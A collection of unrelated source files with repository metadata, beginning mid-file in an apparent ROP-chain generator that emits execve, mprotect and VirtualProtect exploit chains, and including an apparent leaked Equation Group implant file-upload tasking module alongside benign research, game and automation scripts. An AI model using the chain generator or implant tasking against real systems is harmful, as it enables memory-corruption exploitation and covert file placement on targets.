gadgets.append((self._createAddress, [section.struct.sh_offset+0x1000+length],{'reg':'edx'},['edx', 'dx', 'dl', 'dh']))
gadgets.append((self._createNumber, [0xb],{'reg':'eax'},['eax', 'ax', 'al', 'ah']))
self._printer.printInfo('Try to create chain which fills registers without delete content of previous filled registers')
chain_tmp += self._createDependenceChain(gadgets)
try:
self._printer.printInfo('Look for syscall gadget')
chain_tmp += self._createSyscall()[0]
self._printer.printInfo('syscall gadget found')
except RopChainError:
try:
self._printer.printInfo('No syscall gadget found!')
self._printer.printInfo('Look for int 0x80 opcode')
chain_tmp += self._createOpcode('cd80')
self._printer.printInfo('int 0x80 opcode found')
except:
try:
self._printer.printInfo('No int 0x80 opcode found')
self._printer.printInfo('Look for call gs:[0x10] opcode')
chain_tmp += self._createOpcode('65ff1510000000')
self._printer.printInfo('call gs:[0x10] found')
except RopChainError:
self._printer.printInfo('No call gs:[0x10] opcode found')
chain += self._printRebase()
chain += 'rop = \'\'\n'
chain += chain_tmp
chain += 'print rop'
print(chain)
class RopChainX86Mprotect(RopChainX86):
"""
Builds a ropchain for mprotect syscall
eax 0x7b
ebx address
ecx size
edx 0x7 -> RWE
"""
@classmethod
def name(cls):
return 'mprotect'
def _createJmp(self, reg='esp'):
r = Ropper(self._binaries[0])
gadgets = []
for section in self._binaries[0].executableSections:
vaddr = section.virtualAddress
gadgets.extend(
r.searchJmpReg(section.bytes, reg, vaddr, section=section))
if len(gadgets) > 0:
if (gadgets[0]._binary, gadgets[0]._section) not in self._usedBinaries:
self._usedBinaries.append((gadgets[0]._binary, gadgets[0]._section))
return self._printRopInstruction(gadgets[0])
else:
return None
def __extract(self, param):
if not match('0x[0-9a-fA-F]{1,8},0x[0-9a-fA-F]+', param) or not match('0x[0-9a-fA-F]{1,8},[0-9]+', param):
raise RopChainError('Parameter have to have the following format: <hexnumber>,<hexnumber> or <hexnumber>,<number>')
split = param.split(',')
if isHex(split[1]):
return (int(split[0], 16), int(split[1], 16))
else:
return (int(split[0], 16), int(split[1], 10))
def create(self, param=None):
if not param:
raise RopChainError('Missing parameter: address:size')
address, size = self.__extract(param)
self._printer.printInfo('ROPchain Generator for syscall mprotect:\n')
self._printer.println('eax 0x7b\nebx address\necx size\nedx 0x7 -> RWE\n')
chain = self._printHeader()
chain += 'shellcode = \'\\xcc\'*100\n\n'
gadgets = []
gadgets.append((self._createNumber, [address],{'reg':'ebx'},['ebx', 'bx', 'bl', 'bh']))
gadgets.append((self._createNumber, [size],{'reg':'ecx'},['ecx', 'cx', 'cl', 'ch']))
gadgets.append((self._createNumber, [0x7],{'reg':'edx'},['edx', 'dx', 'dl', 'dh']))
gadgets.append((self._createNumber, [0x7d],{'reg':'eax'},['eax', 'ax', 'al', 'ah']))
self._printer.printInfo('Try to create chain which fills registers without delete content of previous filled registers')
chain_tmp = ''
chain_tmp += self._createDependenceChain(gadgets)
try:
self._printer.printInfo('Look for syscall gadget')
chain_tmp += self._createSyscall()[0]
self._printer.printInfo('syscall gadget found')
except RopChainError:
chain_tmp += '\n# ADD HERE SYSCALL GADGET\n\n'
self._printer.printInfo('No syscall gadget found!')
self._printer.printInfo('Look for jmp esp')
jmp_esp = self._createJmp()
if jmp_esp:
self._printer.printInfo('jmp esp found')
chain_tmp += jmp_esp
else:
self-_printer.printInfo('no jmp esp found')
chain_tmp += '\n# ADD HERE JMP ESP\n\n'
chain += self._printRebase()
chain += '\nrop = \'\'\n'
chain += chain_tmp
chain += 'rop += shellcode\n\n'
chain += 'print(rop)\n'
print(chain)
class RopChainX86VirtualProtect(RopChainX86):
"""
Builds a ropchain for a VirtualProtect call using pushad
eax 0x90909090
ecx old protection (writable addr)
edx 0x40 (RWE)
ebx size
esp address
ebp return address (jmp esp)
esi pointer to VirtualProtect
edi ret (rop nop)
"""
@classmethod
def name(cls):
return 'virtualprotect'
def _createPushad(self):
pushad = self._find(Category.PUSHAD)
if pushad:
return self._printRopInstruction(pushad)
else:
self._printer.printInfo('No pushad found!')
return '# Add here PUSHAD gadget!'
def _createJmp(self, reg='esp'):
r = Ropper(self._binaries[0])
gadgets = []
for section in self._binaries[0].executableSections:
vaddr = section.offset
gadgets.extend(
r.searchJmpReg(section.bytes, reg, vaddr, section=section))
if len(gadgets) > 0:
if (gadgets[0]._binary, gadgets[0]._section) not in self._usedBinaries:
self._usedBinaries.append((gadgets[0]._binary, gadgets[0]._section))
return gadgets[0]
else:
return ''
def __extract(self, param):
if (not match('0x[0-9a-fA-F]{1,8},0x[0-9a-fA-F]+', param)) and (not match('0x[0-9a-fA-F]+', param)):
raise RopChainError('Parameter have to have the following format: <hexnumber>,<hexnumber> or <hexnumber>')
split = param.split(',')
if len(split) == 2:
if isHex(split[1]):
return (int(split[0], 16), int(split[1], 16))
else:
return (None, int(split[0], 16))
def __getVirtualProtectEntry(self):
for binary in self._binaries:
if binary.type == Type.PE:
s = binary.sections['.idata']
for descriptorData in s.importDescriptorTable:
for function in descriptorData.functions:
if str(function[1]) == 'VirtualProtect':
return function[2]
else:
self._printer.printError('File is not a PE file.')
return None
def create(self, param=None):
if not param:
raise RopChainError('Missing parameter: address,size or size')
self._printer.printInfo('Ropchain Generator for VirtualProtect:\n')
self._printer.println('eax 0x90909090\necx old protection (writable addr)\nedx 0x40 (RWE)\nebx size\nesp address\nebp return address (jmp esp)\nesi pointer to VirtualProtect\nedi ret (rop nop)\n')
address, size = self.__extract(param)
given = False
if not address:
address = self.__getVirtualProtectEntry()
if not address:
self._printer.printError('No IAT-Entry for VirtualProtect found!')
raise RopChainError('No IAT-Entry for VirtualProtect found and no address is given')
else:
given = True
writeable_ptr = self._binaries[0].getWriteableSection().offset + 0x4
jmp_esp = self._createJmp()
ret_addr = self._searchOpcode('c3')
chain = self._printHeader()
chain += '\n\nshellcode = \'\\xcc\'*100\n\n'
gadgets = []
to_extend = []
chain_tmp = ''
try:
self._printer.printInfo('Try to create gadget to fill esi with content of IAT address: %s' % address)
chain_tmp += self._createLoadRegValueFrom('esi', address)[0]
if given:
gadgets.append((self._createNumber, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al','esi','si']))
else:
gadgets.append((self._createAddress, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al','esi','si']))
to_extend = ['esi','si']
except:
self._printer.printInfo('Cannot create fill esi gadget!')
self._printer.printInfo('Try to create this chain:\n')
self._printer.println('eax Pointer to VirtualProtect\necx old protection (writable addr)\nedx 0x40 (RWE)\nebx size\nesp address\nebp return address (jmp esp)\nesi pointer to jmp [eax]\nedi ret (rop nop)\n')
jmp_eax = self._searchOpcode('ff20') # jmp [eax]
gadgets.append((self._createAddress, [jmp_eax.lines[0][0]],{'reg':'esi'},['esi','si']))
if given:
gadgets.append((self._createNumber, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al']))
else:
gadgets.append((self._createAddress, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al']))
gadgets.append((self._createNumber, [size],{'reg':'ebx'},['ebx', 'bx', 'bl', 'bh']+to_extend))
gadgets.append((self._createAddress, [writeable_ptr],{'reg':'ecx'},['ecx', 'cx', 'cl', 'ch']+to_extend))
gadgets.append((self._createAddress, [jmp_esp.lines[0][0]],{'reg':'ebp'},['ebp', 'bp']+to_extend))
gadgets.append((self._createNumber, [0x40],{'reg':'edx'},['edx', 'dx', 'dh', 'dl']+to_extend))
gadgets.append((self._createAddress, [ret_addr.lines[0][0]],{'reg':'edi'},['edi', 'di']+to_extend))
self._printer.printInfo('Try to create chain which fills registers without delete content of previous filled registers')
chain_tmp += self._createDependenceChain(gadgets)
self._printer.printInfo('Look for pushad gadget')
chain_tmp += self._createPushad()
chain += self._printRebase()
chain += 'rop = \'\'\n'
chain += chain_tmp
chain += 'rop += shellcode\n\n'
chain += 'print(rop)\n'
print(chain)
|
gpl-2.0
| -8,572,569,844,129,845,000
| 39.707537
| 218
| 0.562022
| false
| 3.858925
| false
| false
| false
|
myfavouritekk/TPN
|
tools/propagate/regression_propagation.py
|
1
|
6216
|
#!/usr/bin/env python
# --------------------------------------------------------
# Test regression propagation on ImageNet VID video
# Modified by Kai KANG (myfavouritekk@gmail.com)
# --------------------------------------------------------
"""Test a Fast R-CNN network on an image database."""
import argparse
import pprint
import time
import os
import os.path as osp
import sys
import cPickle
import numpy as np
this_dir = osp.dirname(__file__)
# add caffe-mpi path
sys.path.insert(0, osp.join(this_dir, '../../external/caffe-mpi/build/install/python'))
import caffe
# add py-faster-rcnn paths
sys.path.insert(0, osp.join(this_dir, '../../external/py-faster-rcnn/lib'))
from fast_rcnn.craft import im_detect
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list
# add external libs
sys.path.insert(0, osp.join(this_dir, '../../external'))
from vdetlib.utils.protocol import proto_load, proto_dump
# add src libs
sys.path.insert(0, osp.join(this_dir, '../../src'))
from tpn.propagate import roi_propagation
from tpn.target import add_track_targets
from tpn.data_io import save_track_proto_to_zip
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Test a Fast R-CNN network')
parser.add_argument('vid_file')
parser.add_argument('box_file')
parser.add_argument('save_file', help='Save zip file')
parser.add_argument('--annot_file', default=None,
help='Ground truth annotation file. [None]')
parser.add_argument('--job', dest='job_id', help='Job slot, GPU ID + 1. [1]',
default=1, type=int)
parser.add_argument('--def', dest='prototxt',
help='prototxt file defining the network',
default=None, type=str)
parser.add_argument('--param', dest='caffemodel',
help='model to test',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file', default=None, type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--num_dets', dest='max_per_image',
help='max number of detections per image',
default=100, type=int)
parser.add_argument('--num_per_batch', dest='boxes_num_per_batch',
help='split boxes to batches. [32]',
default=32, type=int)
parser.add_argument('--bbox_mean', dest='bbox_mean',
help='the mean of bbox',
default=None, type=str)
parser.add_argument('--bbox_std', dest='bbox_std',
help='the std of bbox',
default=None, type=str)
parser.add_argument('--bbox_pred_layer', dest='bbox_pred_layer',
help='Layer name for bbox regression layer in feature net.',
default='bbox_pred_vid', type=str)
parser.add_argument('--scheme', help='Propagation scheme. [weighted]',
choices=['max', 'mean', 'weighted'], default='weighted')
parser.add_argument('--length', type=int, default=9,
help='Propagation length. [9]')
parser.add_argument('--sample_rate', type=int, default=1,
help='Temporal subsampling rate. [1]')
parser.add_argument('--offset', type=int, default=0,
help='Offset of sampling. [0]')
parser.add_argument('--wait', dest='wait',
help='wait until net file exists',
default=True, type=bool)
parser.add_argument('--gpus', nargs='+', default=None, type=int, help='Available GPUs.')
parser.add_argument('--zip', action='store_true',
help='Save as zip files rather than track protocols')
parser.add_argument('--keep_feat', action='store_true',
help='Keep feature.')
parser.set_defaults(vis=False, zip=False, keep_feat=False)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
print 'Called with args:'
print args
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.job_id - 1
print 'Using config:'
pprint.pprint(cfg)
while not os.path.exists(args.caffemodel) and args.wait:
print 'Waiting for {} to exist...'.format(args.caffemodel)
time.sleep(10)
caffe.set_mode_gpu()
if args.gpus is None:
caffe.set_device(args.job_id - 1)
else:
assert args.job_id <= len(args.gpus)
caffe.set_device(args.gpus[args.job_id-1])
net = caffe.Net(args.prototxt, args.caffemodel, caffe.TEST)
net.name = os.path.splitext(os.path.basename(args.caffemodel))[0]
# apply bbox regression normalization on the net weights
with open(args.bbox_mean, 'rb') as f:
bbox_means = cPickle.load(f)
with open(args.bbox_std, 'rb') as f:
bbox_stds = cPickle.load(f)
net.params[args.bbox_pred_layer][0].data[...] = \
net.params[args.bbox_pred_layer][0].data * bbox_stds[:, np.newaxis]
net.params[args.bbox_pred_layer][1].data[...] = \
net.params[args.bbox_pred_layer][1].data * bbox_stds + bbox_means
vid_proto = proto_load(args.vid_file)
box_proto = proto_load(args.box_file)
track_proto = roi_propagation(vid_proto, box_proto, net, im_detect, scheme=args.scheme,
length=args.length, sample_rate=args.sample_rate,
keep_feat=args.keep_feat, batch_size=args.boxes_num_per_batch)
# add ground truth targets if annotation file is given
if args.annot_file is not None:
annot_proto = proto_load(args.annot_file)
add_track_targets(track_proto, annot_proto)
if args.zip:
save_track_proto_to_zip(track_proto, args.save_file)
else:
proto_dump(track_proto, args.save_file)
|
mit
| 8,607,709,763,917,852,000
| 38.341772
| 92
| 0.591055
| false
| 3.632963
| false
| false
| false
|
TunnelBlanket/Houdini
|
Houdini/Data/Stamp.py
|
1
|
1225
|
# coding: utf-8
from sqlalchemy import Column, Integer, SmallInteger, text, ForeignKey
from sqlalchemy.orm import relationship
from Houdini.Data import Base
metadata = Base.metadata
class Stamp(Base):
__tablename__ = 'stamp'
PenguinID = Column(ForeignKey(u'penguin.ID', ondelete=u'CASCADE', onupdate=u'CASCADE'), primary_key=True, nullable=False)
Stamp = Column(SmallInteger, primary_key=True, nullable=False)
Recent = Column(Integer, nullable=False, server_default=text("1"))
penguin = relationship(u'Penguin')
class CoverStamp(Base):
__tablename__ = 'cover_stamps'
PenguinID = Column(ForeignKey(u'penguin.ID', ondelete=u'CASCADE', onupdate=u'CASCADE'), primary_key=True, nullable=False)
Stamp = Column(SmallInteger, primary_key=True, nullable=False, server_default=text("0"))
X = Column(SmallInteger, nullable=False, server_default=text("0"))
Y = Column(SmallInteger, nullable=False, server_default=text("0"))
Type = Column(SmallInteger, nullable=False, server_default=text("0"))
Rotation = Column(SmallInteger, nullable=False, server_default=text("0"))
Depth = Column(SmallInteger, nullable=False, server_default=text("0"))
penguin = relationship(u'Penguin')
|
mit
| -1,121,676,306,723,954,800
| 41.275862
| 125
| 0.726531
| false
| 3.431373
| false
| false
| false
|
Crompulence/cpl-library
|
examples/interactive_plot_example/python/CFD_recv_and_plot_grid_interactive.py
|
1
|
3724
|
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider
from mpi4py import MPI
from cplpy import CPL
from draw_grid import draw_grid
#initialise MPI and CPL
comm = MPI.COMM_WORLD
CPL = CPL()
CFD_COMM = CPL.init(CPL.CFD_REALM)
nprocs_realm = CFD_COMM.Get_size()
# Parameters of the cpu topology (cartesian grid)
npxyz = np.array([1, 1, 1], order='F', dtype=np.int32)
NProcs = np.product(npxyz)
xyzL = np.array([10.0, 10.0, 10.0], order='F', dtype=np.float64)
xyz_orig = np.array([0.0, 0.0, 0.0], order='F', dtype=np.float64)
ncxyz = np.array([16, 6, 16], order='F', dtype=np.int32)
if (nprocs_realm != NProcs):
print("Non-coherent number of processes in CFD ", nprocs_realm,
" no equal to ", npxyz[0], " X ", npxyz[1], " X ", npxyz[2])
MPI.Abort(errorcode=1)
#Setup coupled simulation
cart_comm = CFD_COMM.Create_cart([npxyz[0], npxyz[1], npxyz[2]])
CPL.setup_cfd(cart_comm, xyzL, xyz_orig, ncxyz)
#Plot output
fig, ax = plt.subplots(1,1)
plt.subplots_adjust(bottom=0.25)
axslider = plt.axes([0.25, 0.1, 0.65, 0.03])
freq = 1.
sfreq = Slider(axslider, 'Freq', 0.1, 2.0, valinit=freq)
def update(val):
freq = sfreq.val
global freq
print("CHANGED", freq)
sfreq.on_changed(update)
plt.ion()
plt.show()
# === Plot both grids ===
dx = CPL.get("xl_cfd")/float(CPL.get("ncx"))
dy = CPL.get("yl_cfd")/float(CPL.get("ncy"))
dz = CPL.get("zl_cfd")/float(CPL.get("ncz"))
ioverlap = (CPL.get("icmax_olap")-CPL.get("icmin_olap")+1)
joverlap = (CPL.get("jcmax_olap")-CPL.get("jcmin_olap")+1)
koverlap = (CPL.get("kcmax_olap")-CPL.get("kcmin_olap")+1)
xoverlap = ioverlap*dx
yoverlap = joverlap*dy
zoverlap = koverlap*dz
for time in range(100000):
# recv data to plot
olap_limits = CPL.get_olap_limits()
portion = CPL.my_proc_portion(olap_limits)
[ncxl, ncyl, nczl] = CPL.get_no_cells(portion)
recv_array = np.zeros((1, ncxl, ncyl, nczl), order='F', dtype=np.float64)
recv_array, ierr = CPL.recv(recv_array, olap_limits)
#Plot CFD and coupler Grid
draw_grid(ax,
nx=CPL.get("ncx"),
ny=CPL.get("ncy"),
nz=CPL.get("ncz"),
px=CPL.get("npx_cfd"),
py=CPL.get("npy_cfd"),
pz=CPL.get("npz_cfd"),
xmin=CPL.get("x_orig_cfd"),
ymin=CPL.get("y_orig_cfd"),
zmin=CPL.get("z_orig_cfd"),
xmax=(CPL.get("icmax_olap")+1)*dx,
ymax=CPL.get("yl_cfd"),
zmax=(CPL.get("kcmax_olap")+1)*dz,
lc = 'r',
label='CFD')
#Plot MD domain
draw_grid(ax, nx=1, ny=1, nz=1,
px=CPL.get("npx_md"),
py=CPL.get("npy_md"),
pz=CPL.get("npz_md"),
xmin=CPL.get("x_orig_md"),
ymin=-CPL.get("yl_md")+yoverlap,
zmin=CPL.get("z_orig_md"),
xmax=(CPL.get("icmax_olap")+1)*dx,
ymax=yoverlap,
zmax=(CPL.get("kcmax_olap")+1)*dz,
label='MD')
#Plot x component on grid
x = np.linspace(CPL.get("x_orig_cfd")+.5*dx,xoverlap-.5*dx,ioverlap)
z = np.linspace(CPL.get("z_orig_cfd")+.5*dz,zoverlap-.5*dz,koverlap)
for j in range(joverlap):
ax.plot(x, 0.5*dy*(recv_array[0,:,j,0]+1.+2*j), 's-')
ax.set_xlabel('$x$')
ax.set_ylabel('$y$')
print(time, freq)
plt.pause(0.1)
ax.cla()
# send data to update
olap_limits = CPL.get_olap_limits()
portion = CPL.my_proc_portion(olap_limits)
[ncxl, ncyl, nczl] = CPL.get_no_cells(portion)
send_array = freq*np.ones((1, ncxl, ncyl, nczl), order='F', dtype=np.float64)
CPL.send(send_array, olap_limits)
CPL.finalize()
MPI.Finalize()
|
gpl-3.0
| 4,246,740,477,422,610,000
| 30.033333
| 81
| 0.583512
| false
| 2.528174
| false
| false
| false
|
DarthMaulware/EquationGroupLeaks
|
Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Tasking/Mcl_Cmd_Put_Tasking.py
|
1
|
6883
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: Mcl_Cmd_Put_Tasking.py
UPLOADS_DIR = 'Uploads'
MAX_CHUNK_SIZE = 1047552
def TaskingMain(namespace):
import mcl.imports
import mcl.target
import mcl.tasking
import mcl.tasking.env
import mcl.tasking.resource
import mcl.tasking.technique
import mcl.tasking.virtualdir
from mcl.object.Message import MarshalMessage
mcl.imports.ImportWithNamespace(namespace, 'mca.file.cmd.put', globals())
mcl.imports.ImportWithNamespace(namespace, 'mca.file.cmd.put.tasking', globals())
lpParams = mcl.tasking.GetParameters()
if lpParams['chunksize'] == 0 or lpParams['chunksize'] >= MAX_CHUNK_SIZE:
mcl.tasking.OutputError('Invalid chunkSize given')
return False
else:
provider = mcl.tasking.technique.Lookup('PUT', mcl.tasking.technique.TECHNIQUE_MCL_NTNATIVEAPI, lpParams['method'])
if lpParams['source'] == None or len(lpParams['source']) == 0:
mcl.tasking.OutputError('No local file given')
return False
local = lpParams['source']
if lpParams['remote'] == None or len(lpParams['remote']) == 0:
if local.find('\\') != -1 or local.find('/') != -1:
mcl.tasking.OutputError('You must specify a remote file name if you specify a path for the local file')
return False
remote = local
else:
remote = lpParams['remote']
resFlags = 0
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_ARCH
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_OS
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_LIBC
if lpParams['compiled']:
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_COMPILED
f, openedName, usedProject = mcl.tasking.resource.Open(local, resFlags, UPLOADS_DIR, lpParams['project'])
if f == None:
mcl.tasking.OutputError("Failed to open local file '%s'" % local)
return False
try:
import os.path
import array
fileSize = os.path.getsize(openedName)
if fileSize == 0 or fileSize > 4294967295:
mcl.tasking.OutputError("Invalid file size (%u) for put of '%s'" % (fileSize, openedName))
return False
taskXml = mcl.tasking.Tasking()
taskXml.AddProvider(mcl.tasking.technique.TECHNIQUE_MCL_NTNATIVEAPI, provider)
mcl.tasking.OutputXml(taskXml.GetXmlObject())
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('PutFile')
xml.AddAttribute('name', openedName)
xml.AddAttribute('size', '%u' % fileSize)
mcl.tasking.OutputXml(xml)
fileBytes = array.array('B', f.read())
if len(fileBytes) != fileSize:
mcl.tasking.OutputError('Failed to read file (read=%u | expected=%u)' % (len(fileBytes), fileSize))
return False
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_PUT_COMPLETE, 'false')
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_BYTES_LEFT, '%u' % fileSize)
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_FILE_SIZE, '%u' % fileSize)
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_FILE_OPENED, 'false')
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED, 'false')
finally:
f.close()
f = None
createParams = mca.file.cmd.put.CreateParams()
createParams.writeOffset = 0
createParams.provider = provider
if lpParams['permanent']:
createParams.flags |= mca.file.cmd.put.PARAMS_CREATE_FLAG_PERMANENT
try:
createParams.filePath = mcl.tasking.virtualdir.GetFullPath(remote)
except:
mcl.tasking.OutputError('Failed to apply virtual directory to remote name')
return False
rpc = mca.file.cmd.put.tasking.RPC_INFO_CREATE
msg = MarshalMessage()
createParams.Marshal(msg)
rpc.SetData(msg.Serialize())
rpc.SetMessagingType('message')
res = mcl.tasking.RpcPerformCall(rpc)
if res != mcl.target.CALL_SUCCEEDED:
mcl.tasking.RecordModuleError(res, 0, mca.file.cmd.put.errorStrings)
return False
import time
while not mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_FILE_OPENED):
if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
time.sleep(1)
chunkIndex = 0
bytesLeft = fileSize
while bytesLeft > 0:
if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
numBytesToSend = bytesLeft
if numBytesToSend > lpParams['chunksize']:
numBytesToSend = lpParams['chunksize']
startIndex = fileSize - bytesLeft
endIndex = startIndex + numBytesToSend
writeParams = mca.file.cmd.put.WriteParams()
writeParams.data = fileBytes[startIndex:endIndex]
writeParams.chunkIndex = chunkIndex
if numBytesToSend >= bytesLeft:
writeParams.lastData = True
chunkIndex = chunkIndex + 1
rpc = mca.file.cmd.put.tasking.RPC_INFO_WRITE
msg = MarshalMessage()
writeParams.Marshal(msg)
rpc.SetData(msg.Serialize())
rpc.SetMessagingType('message')
res = mcl.tasking.RpcPerformCall(rpc)
if res != mcl.target.CALL_SUCCEEDED:
mcl.tasking.RecordModuleError(res, 0, mca.file.cmd.put.errorStrings)
return False
newBytesLeft = bytesLeft
while newBytesLeft == bytesLeft:
if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
time.sleep(1)
newBytesLeft = int(mcl.tasking.env.GetValue(mca.file.cmd.put.LP_ENV_BYTES_LEFT))
bytesLeft = newBytesLeft
while not mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_PUT_COMPLETE):
if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
time.sleep(1)
if not lpParams['permanent']:
mcl.tasking.TaskGoToBackground()
while not mcl.CheckForStop():
time.sleep(1)
return mcl.tasking.TaskSetStatus(mcl.target.CALL_SUCCEEDED)
if __name__ == '__main__':
import sys
if TaskingMain(sys.argv[1]) != True:
sys.exit(-1)
|
unlicense
| -8,070,547,693,328,371,000
| 44.289474
| 123
| 0.611361
| false
| 3.531555
| false
| false
| false
|
helewonder/knightgame
|
wargame/game.py
|
1
|
3956
|
from hut import Hut, create_unit
from functions import print_bold, print_dotted_line, show_health, \
print_wave_line
from knight import Knight
from uniterror import HutNotNumberError, HutOutRangeError
class OrGame():
"""
The Game Class , mainly
"""
def __init__(self, hut_numbers=5):
"""get the game ready with scenario ready, default have 5huts.
:param hut_numbers: in the game, how many huts
:type hut_numbers: int
"""
self.acquired_all_huts = False
self.huts = []
self.player = None
self.hut_numbers = hut_numbers
@property
def get_occupants(self):
"""Show all huts with it's occupant
:return: the message each hut with occupant
:rtype: basestring
"""
msg = "["
for hut in self.huts:
msg += str(hut.number) + ":" + hut.get_occupant_type + ", "
msg += '\b\b]'
return msg
def _process_user_choice(self):
verifying_choice = True
idx = 0
print_dotted_line()
print("Current Occupants:\n\t%s" % self.get_occupants)
print_dotted_line()
while verifying_choice:
user_choice = input(
"Choose a hut number to enter(1~" + str(
self.hut_numbers) + "):")
try:
if not user_choice.isdigit():
raise HutNotNumberError(
"Your input '{}' is not number.".format(user_choice))
idx = int(user_choice)
if idx > self.hut_numbers or idx < 0:
raise HutOutRangeError(
"input not in range(1~" + str(self.hut_numbers) + ")")
except HutNotNumberError as e:
print_wave_line()
print(e)
print(e.error_message)
print_wave_line()
continue
except HutOutRangeError as e:
print_wave_line()
print(e)
print(e.error_message)
print_wave_line()
continue
if self.huts[idx - 1].is_acquired:
print(
"You have already acquired this hut. Try again",
"<Info:You can NOT get healed in already acquired hut.>"
)
else:
verifying_choice = False
return idx
def play(self):
"""
Workhorse method to play the game....
Create a Knight instance, create huts and preoccupy them with a game
Character instance (or leave empty)
"""
self.setup_game_scenario()
while not self.acquired_all_huts:
idx = self._process_user_choice()
self.player.acquire_hut(self.huts[idx - 1])
if self.player.health_meter <= 0:
print("You Lose :( Better luck next time")
break
for hut in self.huts:
if not hut.is_acquired:
break
else:
self.acquired_all_huts = True
if self.acquired_all_huts:
print_bold("You Win!!! Congratulations!!!!!!")
def setup_game_scenario(self):
"""
Create player and huts and then randomly pre-occupy huts...
"""
self.player = Knight("Sir Foo")
for number in range(self.hut_numbers):
self.huts.append(Hut(number + 1, create_unit()))
self._show_mission()
# print_bold("Current Occupants:", self.get_occupants)
show_health(self.player, bold=True, end='\n')
@staticmethod
def _show_mission():
print_dotted_line()
print_bold("Welcome to Play the Knight Game!", end='\n')
print_dotted_line()
print_bold("Mission:")
print("\t1. Defeat the enemy in any hut")
print("\t2. Bring all huts in the village under your contral")
|
mit
| -2,352,176,094,657,368,000
| 30.903226
| 78
| 0.523509
| false
| 4.016244
| false
| false
| false
|
Mach33Labs/labautomation
|
github.py
|
1
|
5717
|
#!/usr/bin/python
import datetime
import fcntl
import github3
import gzip
import json
import os
import re
import select
import socket
import subprocess
import sys
import time
import mysql.connector
TARGET_VM = 'devosa'
TARGET_IP_BLOCK = '192.168.53.0/24'
with open(os.path.expanduser('~/.github_automation'), 'r') as f:
config = json.loads(f.read())
ISSUE_URL_RE = re.compile('https://api.github.com/repos/(.*)/(.*)/issues/(.*)')
def github_comment(issue_url, comment):
if not issue_url:
return
g = github3.login(config['github_user'], config['github_password'])
m = ISSUE_URL_RE.match(issue_url)
if not m:
print 'Could not parse issue URL!'
return
issue = g.issue(m.group(1), m.group(2), int(m.group(3)))
issue.create_comment(comment)
def process(job):
ostrich_sha = job['sha']
if job['project'] != 'ostrich':
ostrich_sha = 'master'
state = {}
with open('state.json.%s' % job['flavour'], 'r') as f:
state = json.loads(f.read())
state['complete']['osa-branch'] = job['branch']
state['complete']['ironic-ip-block'] = TARGET_IP_BLOCK
with open('state.json', 'w') as f:
f.write(json.dumps(state, indent=4, sort_keys=True))
short_branch = job['branch'].replace('stable/', '')
now = datetime.datetime.now()
job_id = ('%04d%02d%02d-%02d%02d-%s-%s-%s'
%(now.year, now.month, now.day, now.hour, now.minute,
job['project'], short_branch, job['sha']))
job['short_branch'] = short_branch
job['job_id'] = job_id
job['timestamp'] = job['timestamp'].isoformat()
with open('job.json', 'w') as f:
f.write(json.dumps(job, indent=4, sort_keys=True))
with gzip.open('%s.log.gz' % job_id, 'w') as f:
rc = execute('sudo ./reset_osa.sh %s %s %s %s %s'
%(TARGET_VM, job['distro'], ostrich_sha, job_id,
job['project']), f)
return (rc, job_id)
def execute(command, logfile):
print('Running %s' % command)
obj = subprocess.Popen(command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
flags = fcntl.fcntl(obj.stdout, fcntl.F_GETFL)
fcntl.fcntl(obj.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK)
flags = fcntl.fcntl(obj.stderr, fcntl.F_GETFL)
fcntl.fcntl(obj.stderr, fcntl.F_SETFL, flags | os.O_NONBLOCK)
obj.stdin.close()
while obj.poll() is None:
readable, _, _ = select.select([obj.stderr, obj.stdout], [], [], 10)
for f in readable:
d = os.read(f.fileno(), 10000)
sys.stdout.write(d)
logfile.write(d)
logfile.flush()
print('... process complete')
returncode = obj.returncode
print('... exit code %d' % returncode)
return returncode
def main():
while True:
conn = mysql.connector.connect(**config['db'])
cursor = conn.cursor(dictionary=True, buffered=True)
cursor.execute('select * from jobs where processed=0 and '
'machine is null order by timestamp;')
if cursor.rowcount == 0:
print '%s No work, sleeping' % datetime.datetime.now()
time.sleep(60)
continue
job = cursor.fetchone()
cursor.execute('update jobs set machine=%(machine)s where '
'uuid=%(uuid)s and machine is null;',
{
'machine': socket.gethostname(),
